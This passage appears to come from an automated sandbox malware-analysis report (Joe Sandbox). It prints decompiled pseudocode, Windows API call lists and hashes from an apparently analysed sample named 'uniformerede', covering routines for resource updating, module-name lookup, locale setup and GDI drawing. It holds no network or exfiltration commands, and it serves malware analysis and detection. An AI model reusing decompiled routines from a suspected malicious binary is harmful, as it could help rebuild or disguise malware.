                                                                                                                                                                                                                            					_v20 =  *((intOrPtr*)( *_t79))( *[fs:eax], 0x477472, _t81);
                                                                                                                                                                                                                            					_v24 = E0040275C( *((intOrPtr*)( *_t79))());
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t79 + 0xc))();
                                                                                                                                                                                                                            					E00403BEC(_t79);
                                                                                                                                                                                                                            					_t47 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            					FreeLibrary(_t47);
                                                                                                                                                                                                                            					_t53 = UpdateResourceA(_t61, 0xa, E00404E80(_v12), 0, _v24, _v20);
                                                                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                                                                            					_v13 = _t53 + 1;
                                                                                                                                                                                                                            					if(EndUpdateResourceA(_t61, 0) == 0 || _v13 == 0) {
                                                                                                                                                                                                                            						_t56 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t56 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v13 = _t56;
                                                                                                                                                                                                                            					_pop(_t75);
                                                                                                                                                                                                                            					 *[fs:eax] = _t75;
                                                                                                                                                                                                                            					_push(0x477479);
                                                                                                                                                                                                                            					return E0040277C(_v24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 004773A8
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,00000000,00000000,00477494), ref: 00477418
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00477433
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00477444
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$BeginFreeLibrary
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2368538523-0
                                                                                                                                                                                                                            • Opcode ID: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                                                                                                                                                                                            • Instruction ID: 788fa2fdaf6e603f0e993ca8ed72eb25dca608fc93a6157178922b6ccb5e32dc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07fed57a9aed454ea86297e705330f03264fc4d740f29f239a2a5f1fb7689370
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66317270B04205AFD701EBB9DC41BAEBBB9EB49704F5084BAF504F7291DA79AD00C799
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CED0(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v273;
                                                                                                                                                                                                                            				char _v534;
                                                                                                                                                                                                                            				char _v790;
                                                                                                                                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                                                                                                                                            				char _v824;
                                                                                                                                                                                                                            				intOrPtr _v828;
                                                                                                                                                                                                                            				char _v832;
                                                                                                                                                                                                                            				intOrPtr _v836;
                                                                                                                                                                                                                            				char _v840;
                                                                                                                                                                                                                            				intOrPtr _v844;
                                                                                                                                                                                                                            				char _v848;
                                                                                                                                                                                                                            				char* _v852;
                                                                                                                                                                                                                            				char _v856;
                                                                                                                                                                                                                            				char _v860;
                                                                                                                                                                                                                            				char _v1116;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t40;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr* _t87;
                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t93 = __fp0;
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t73 = __edx;
                                                                                                                                                                                                                            				_t87 = __eax;
                                                                                                                                                                                                                            				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                                                                                                                                            				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                                                                                                                                            					_t40 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                                                                                                                                            					_v12 = E0040CEC4(_t73);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v12 = _t73 - _v820.AllocationBase;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                                                                                                                                                                                            				_t74 = 0x40d050;
                                                                                                                                                                                                                            				_t86 = 0x40d050;
                                                                                                                                                                                                                            				_t83 =  *0x408034; // 0x408080
                                                                                                                                                                                                                            				if(E00403D78(_t87, _t83) != 0) {
                                                                                                                                                                                                                            					_t74 = E00404E80( *((intOrPtr*)(_t87 + 4)));
                                                                                                                                                                                                                            					_t69 = E00409F88(_t74, 0x40d050);
                                                                                                                                                                                                                            					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                                                                                                                                                                            						_t86 = 0x40d054;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t51 =  *0x49ddfc; // 0x407dac
                                                                                                                                                                                                                            				_t16 = _t51 + 4; // 0xffd1
                                                                                                                                                                                                                            				_t53 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                                                                                                                                            				E00403B3C( *_t87,  &_v1116);
                                                                                                                                                                                                                            				_v860 =  &_v1116;
                                                                                                                                                                                                                            				_v856 = 4;
                                                                                                                                                                                                                            				_v852 =  &_v273;
                                                                                                                                                                                                                            				_v848 = 6;
                                                                                                                                                                                                                            				_v844 = _v12;
                                                                                                                                                                                                                            				_v840 = 5;
                                                                                                                                                                                                                            				_v836 = _t74;
                                                                                                                                                                                                                            				_v832 = 6;
                                                                                                                                                                                                                            				_v828 = _t86;
                                                                                                                                                                                                                            				_v824 = 6;
                                                                                                                                                                                                                            				E0040A624(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                                                                                                                                                                                            				return E00409F88(_v8, _t86);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                                                                                                                                                                                            • Instruction ID: b6cc919b410ec48c376b57bdd6b10f9d41704385299fbac947e4ea08e3070186
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f390f3552be5d48c375f75869cc29fee73cd4b235c895b91622e8669ee325a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE414270A002589BDB21DB69CC85BDAB7FDAB18305F0441FAA548F7282D7789F84CF59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040CECE(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v273;
                                                                                                                                                                                                                            				char _v534;
                                                                                                                                                                                                                            				char _v790;
                                                                                                                                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                                                                                                                                            				char _v824;
                                                                                                                                                                                                                            				intOrPtr _v828;
                                                                                                                                                                                                                            				char _v832;
                                                                                                                                                                                                                            				intOrPtr _v836;
                                                                                                                                                                                                                            				char _v840;
                                                                                                                                                                                                                            				intOrPtr _v844;
                                                                                                                                                                                                                            				char _v848;
                                                                                                                                                                                                                            				char* _v852;
                                                                                                                                                                                                                            				char _v856;
                                                                                                                                                                                                                            				char _v860;
                                                                                                                                                                                                                            				char _v1116;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t40;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				intOrPtr* _t92;
                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t74 = __edx;
                                                                                                                                                                                                                            				_t92 = __eax;
                                                                                                                                                                                                                            				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                                                                                                                                            				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                                                                                                                                            					_t40 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                                                                                                                                            					_v12 = E0040CEC4(_t74);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v12 = _t74 - _v820.AllocationBase;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00409FEC( &_v273, 0x104, E0040E020(0x5c) + 1);
                                                                                                                                                                                                                            				_t75 = 0x40d050;
                                                                                                                                                                                                                            				_t89 = 0x40d050;
                                                                                                                                                                                                                            				_t85 =  *0x408034; // 0x408080
                                                                                                                                                                                                                            				if(E00403D78(_t92, _t85) != 0) {
                                                                                                                                                                                                                            					_t75 = E00404E80( *((intOrPtr*)(_t92 + 4)));
                                                                                                                                                                                                                            					_t69 = E00409F88(_t75, 0x40d050);
                                                                                                                                                                                                                            					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                                                                                                                                                                            						_t89 = 0x40d054;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t51 =  *0x49ddfc; // 0x407dac
                                                                                                                                                                                                                            				_t16 = _t51 + 4; // 0xffd1
                                                                                                                                                                                                                            				_t53 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				LoadStringA(E00405FDC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                                                                                                                                            				E00403B3C( *_t92,  &_v1116);
                                                                                                                                                                                                                            				_v860 =  &_v1116;
                                                                                                                                                                                                                            				_v856 = 4;
                                                                                                                                                                                                                            				_v852 =  &_v273;
                                                                                                                                                                                                                            				_v848 = 6;
                                                                                                                                                                                                                            				_v844 = _v12;
                                                                                                                                                                                                                            				_v840 = 5;
                                                                                                                                                                                                                            				_v836 = _t75;
                                                                                                                                                                                                                            				_v832 = 6;
                                                                                                                                                                                                                            				_v828 = _t89;
                                                                                                                                                                                                                            				_v824 = 6;
                                                                                                                                                                                                                            				E0040A624(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                                                                                                                                                                                                            				return E00409F88(_v8, _t89);
                                                                                                                                                                                                                            			}
































                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                                                            • LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                                                                                                                                                                                            • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E174() {
                                                                                                                                                                                                                            				char _v152;
                                                                                                                                                                                                                            				short _v410;
                                                                                                                                                                                                                            				signed short _t14;
                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				int _t26;
                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                            				int* _t39;
                                                                                                                                                                                                                            				short* _t41;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *0x49e744 = 0x409;
                                                                                                                                                                                                                            				 *0x49e748 = 9;
                                                                                                                                                                                                                            				 *0x49e74c = 1;
                                                                                                                                                                                                                            				_t14 = GetThreadLocale();
                                                                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                                                                            					 *0x49e744 = _t14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                                                                            					 *0x49e748 = _t14 & 0x3ff;
                                                                                                                                                                                                                            					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				memcpy(0x49b134, 0x40e2c8, 8 << 2);
                                                                                                                                                                                                                            				if( *0x49b0ec != 2) {
                                                                                                                                                                                                                            					_t16 = GetSystemMetrics(0x4a);
                                                                                                                                                                                                                            					__eflags = _t16;
                                                                                                                                                                                                                            					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                                                                                                                                                                            					_t18 = GetSystemMetrics(0x2a);
                                                                                                                                                                                                                            					__eflags = _t18;
                                                                                                                                                                                                                            					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                                                                                                                                                                            					 *0x49e750 = _t31;
                                                                                                                                                                                                                            					__eflags = _t31;
                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                            						return E0040E0FC(__eflags, _t49);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t20 = E0040E15C();
                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                            						 *0x49e751 = 0;
                                                                                                                                                                                                                            						 *0x49e750 = 0;
                                                                                                                                                                                                                            						return _t20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040E0FC(__eflags, _t49);
                                                                                                                                                                                                                            					_t37 = 0x20;
                                                                                                                                                                                                                            					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
                                                                                                                                                                                                                            					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                                                                                                                                                                            					 *0x49e750 = _t32;
                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                            						 *0x49e751 = 0;
                                                                                                                                                                                                                            						return _t23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t24 = 0x80;
                                                                                                                                                                                                                            					_t39 =  &_v152;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *_t39 = _t24;
                                                                                                                                                                                                                            						_t24 = _t24 + 1;
                                                                                                                                                                                                                            						_t39 =  &(_t39[0]);
                                                                                                                                                                                                                            						__eflags = _t24 - 0x100;
                                                                                                                                                                                                                            					} while (_t24 != 0x100);
                                                                                                                                                                                                                            					_t26 =  *0x49e744; // 0x409
                                                                                                                                                                                                                            					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                                                                                                                                                                            					_t18 = 0x80;
                                                                                                                                                                                                                            					_t41 =  &_v410;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						__eflags =  *_t41 - 2;
                                                                                                                                                                                                                            						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                                                                                                                                                                            						 *0x49e751 = _t37;
                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t41 = _t41 + 2;
                                                                                                                                                                                                                            						_t18 = _t18 - 1;
                                                                                                                                                                                                                            						__eflags = _t18;
                                                                                                                                                                                                                            						if(_t18 != 0) {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							return _t18;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L18:
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L17:
                                                                                                                                                                                                                            				return _t18;
                                                                                                                                                                                                                            				goto L18;
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                                                                                                                                                                                              • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1505017576-0
                                                                                                                                                                                                                            • Opcode ID: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                                                                                                                                                                                            • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00428D80(intOrPtr __eax, void* __edx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                            				struct HDC__* _t47;
                                                                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                            				struct HDC__* _t66;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t84 = _t86;
                                                                                                                                                                                                                            				_push(_t67);
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t33 = _v8;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                                                                                                                                                                                            					return _t33;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E004259F4(_v8);
                                                                                                                                                                                                                            					_push(_t84);
                                                                                                                                                                                                                            					_push(0x428e5f);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t86;
                                                                                                                                                                                                                            					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
                                                                                                                                                                                                                            					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                                                                                                                                                                                            					_t47 = E0042A288( *((intOrPtr*)(_v8 + 0x58)));
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_t66 = _t47;
                                                                                                                                                                                                                            					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                                                                                                                                                                                            					if(_t81 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                                                                                                                                                                                                            					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                                                                                                                                                            					if(_t82 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(_t82);
                                                                                                                                                                                                                            						_push(_t66);
                                                                                                                                                                                                                            						L00407440();
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                                                                                                                                                                                                            						_push(_t66);
                                                                                                                                                                                                                            						L00407418();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00425CE8(_v8, _t66);
                                                                                                                                                                                                                            					_t58 =  *0x49b8ac; // 0x2210acc
                                                                                                                                                                                                                            					E0041AFE4(_t58, _t66, _t67, _v8, _t82);
                                                                                                                                                                                                                            					_pop(_t76);
                                                                                                                                                                                                                            					 *[fs:eax] = _t76;
                                                                                                                                                                                                                            					_push(0x428e66);
                                                                                                                                                                                                                            					return E00425B60(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            0x00428e5e
                                                                                                                                                                                                                            0x00428e5e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                              • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00428E5F), ref: 00428DD5
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                                                                                                                                                                                            • 73C9B410.GDI32(00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E17
                                                                                                                                                                                                                            • 73C9B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E23
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2198039625-0
                                                                                                                                                                                                                            • Opcode ID: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                                                                                                                                                                                            • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
